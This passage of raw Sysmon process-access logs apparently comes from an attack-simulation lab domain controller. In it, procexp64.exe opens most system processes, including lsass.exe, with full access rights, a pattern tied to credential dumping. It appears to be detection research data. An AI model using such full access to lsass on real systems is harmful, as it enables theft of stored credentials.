15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790484Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790483Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790482Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790481Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790480Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790479Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790478Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790477Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790476Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790475Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790474Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790473Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790472Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790471Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790470Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790469Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790468Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790467Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790466Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790465Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790464Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790463Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790462Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790461Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790460Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790459Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790458Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790457Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790456Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:43.423{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790581Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790580Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790579Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790578Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790577Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790576Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790575Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790574Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 